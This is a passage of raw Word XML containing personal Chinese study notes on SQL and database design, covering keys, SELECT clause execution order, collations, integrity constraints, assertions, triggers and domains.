      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>注意是组</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>能唯一标识一条记录，该属性组就可以成为一个主键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>成绩表</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>学号</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>课程号</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>成绩</w:t>
      </w:r>
      <w:r>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:t>成绩表中单一一个属性无法唯一标识一条记录，学号和课程号的组合才可以唯一标识一条记录，成绩表中的学号不是成绩表的主键，但它和学生表中的学号相对应，并且学生表中的学号是学生表的主键，则称成绩表中的学号是学生表的外键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>部门表里面有一个字段是上级部门，如果要建立约束关系，简单点可以直接将这个字段设置为</w:t>
      </w:r>
      <w:r>
        <w:t>not null</w:t>
      </w:r>
      <w:r>
        <w:t>。或者将其外键连接向自己。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果设置了外键还要为空，就要所有字段全部为空。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>连接数据库的时候</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>命令还是很讲究的</w:t>
      </w:r>
      <w:r>
        <w:t>,mysql -u guest -p -h 127.0.0.1 collage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:t>是我在代码中使用的账户</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>因为代码文件只要可读就能知道数据库的密码</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>所以我给这个</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>角色</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>设置了很严格的权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>但是在开始进入数据库的命令就需要这么严格</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>最后的数据库可以不添加</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Select</w:t>
      </w:r>
      <w:r>
        <w:t>语句完整的执行顺序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>子句组装来自不同数据源的数据；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>子句基于指定的条件对记录行进行筛选；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>子句将数据划分为多个分组；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>使用聚集函数（</w:t>
      </w:r>
      <w:r>
        <w:t>having</w:t>
      </w:r>
      <w:r>
        <w:t>中使用的聚集函数）进行计算；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>having</w:t>
      </w:r>
      <w:r>
        <w:t>子句筛选分组；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>计算所有的表达式；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>order by</w:t>
      </w:r>
      <w:r>
        <w:t>对结果集进行排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>使用聚集函数（</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>中使用的聚集函数）进行计算；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r>
        <w:t>集合输出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>having</w:t>
      </w:r>
      <w:r>
        <w:t>子句的存在意图就是因为</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>中不能使用聚集函数，</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>不是必须的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3098165" cy="2074545"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="4" name="Picture 4" descr="DeepinScreenshot_select-area_2018091619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916195719"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3098165" cy="2074545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>这里很怪异，</w:t>
      </w:r>
      <w:r>
        <w:t>id1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>id2</w:t>
      </w:r>
      <w:r>
        <w:t>的命名是在</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>中，但是</w:t>
      </w:r>
      <w:r>
        <w:t>order by</w:t>
      </w:r>
      <w:r>
        <w:t>用了，所以</w:t>
      </w:r>
      <w:r>
        <w:t>selec</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t>解析应该比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">order by </w:t>
      </w:r>
      <w:r>
        <w:t>早。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE database zhimingdi character set utf8 collate utf8_general_ci ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>整理如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>utf8_bin</w:t>
      </w:r>
      <w:r>
        <w:t>：区分大小写；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>utf8_general_cs</w:t>
      </w:r>
      <w:r>
        <w:t>：大小写敏感；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>utf8_general_ci</w:t>
      </w:r>
      <w:r>
        <w:t>：大小写不敏感。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>create table if not exists xxx....   if not exists</w:t>
      </w:r>
      <w:r>
        <w:t>存在的话就很方便程序员编写创建表的语句，因为如果存在还创建的话就会引发数据库异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>列级完整性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>涉及单个属性的约束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>列值非空</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>列值唯一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>列值满足表达式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CHECK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>表级完整性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>涉及单个或多个属性的约束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>列值唯一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>列值满足表达式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CHECK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>对于数据的限制还能使用</w:t>
      </w:r>
      <w:r>
        <w:t>assertion</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Trigger</w:t>
      </w:r>
      <w:r>
        <w:t>、域约束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>create assertion &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>断言名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; check &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>谓词</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>create assertion sum-constraint check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>(not exists (select * from branch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:t>where (select sum(amount) from loan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:t>where loan.branch-name = branch.branch-name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;= (select sum(balance) from account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:t>where account.branch-name = branch.branch-name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">　　　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CREATE TABLE SC(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>sno char(5),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>cno char(5),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>grade int,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>CONSTRAINT PK_sno_cno PRIMARY KEY  (sno,cno),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">CONSTRAINT FK_sno FOREIGN KEY (sno) REFERENCES student, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>CONSTRAINT FK_cno FOREIGN KEY (cno) REFERENCES course</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      CONSTRAINT CK_grade CHECK (grade&gt;=0 and grade &lt;=100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Sname varchar(20) CONSTRAINT xxxx NOT NULL</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>后面的括号必须指定</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Ssex CHAR(2) CONSTRAINT xxxx CHECK(Ssex IN('man','male'))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">CONSTRAINT </w:t>
      </w:r>
      <w:r>
        <w:t>语句如果是独立的一行就说明是对表的完整性约束，否则是对列的。对列比对表多了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">NOT NULL </w:t>
      </w:r>
      <w:r>
        <w:t>这种约束。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ALTER table xxx add CONSTRAINT FK_cno FOREIGN KEY (cno) REFERENCES course(cno)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ALTER table xxx drop CONSTRAINT FK_cno FOREIGN KEY (cno) REFERENCES course(cno)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>传闻有的系统不允许修改外键中的那个主键。推荐修改的时候使用级联操作方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>触发器</w:t>
      </w:r>
      <w:r>
        <w:t>Trigger</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE TRIGGER trigger_name [before | after | instead of] [insert | update | delete]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:firstLine="500"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ON tbl_name FOR EACH {ROW|STATEMENT } </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">FOR EACH ROW </w:t>
      </w:r>
      <w:r>
        <w:t>执行指定操作的触发器为操作修改的每一行都调用一次。行级触发器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">FOR EACH STATEMENT </w:t>
      </w:r>
      <w:r>
        <w:t>的触发器只是为任何操作执行一次，不管有多少行被修改。语句级触发器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>create trigger delete_bbsuser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>after delete on extmail.mailbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>for each row</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>delete from xiuno_bbs.bbs_user where email=old.username;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE TRIGGER instructor_salary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>AFTER INSERT OR UPDATE ON instructor  //</w:t>
      </w:r>
      <w:r>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t>语句很神奇</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  FOR EACH ROW </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>EXECUTE PROCEDURE check_salary();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>instead of</w:t>
      </w:r>
      <w:r>
        <w:t>主要对于视图操作，因为如果视图是多表的时候，不能直接进行</w:t>
      </w:r>
      <w:r>
        <w:t>DML</w:t>
      </w:r>
      <w:r>
        <w:t>操作，这个时候可以建立代替触发器（</w:t>
      </w:r>
      <w:r>
        <w:t>instead of</w:t>
      </w:r>
      <w:r>
        <w:t>）来替换事件本身的动作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>域</w:t>
      </w:r>
      <w:r>
        <w:t>(Domain)</w:t>
      </w:r>
      <w:r>
        <w:t>约束：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>在域定义中被定义的一种约束，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>它与在特定域中定义的任何列都有关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>创建的域名作为类型一样使用。域名默认是在当前模式名称下，可以指定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>模式名称</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>想要创建的域名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  create domain domain_name as </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  data type [default default_value] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  [constraint constraint_name] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  check(value condition expression) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  create domain valid_no as </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  int constraint constraint_no </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  check(</w:t>
      </w:r>
      <w:r>
        <w:t>某一字段名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between 100 and 999) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>然后创建表时，使用</w:t>
      </w:r>
      <w:r>
        <w:t>valid_no</w:t>
      </w:r>
      <w:r>
        <w:t>域</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  create table TestDomain ( </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">         emp_id valid_no, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">         emp_name varchar(10));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT [ALL|DISTINCT]&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>目标列表达式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:r>
        <w:t>显示名字</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;[,</w:t>
      </w:r>
      <w:r>
        <w:t>目标列表达式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]…   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>FROM &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>表名或视图名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;[, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>表名或视图名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>[WHERE &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>条件表达式</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>[GROUP BY &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t>1&gt; [HAVING &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>条件表达式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;]]  </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>可能导致数据没有被显示出来（</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
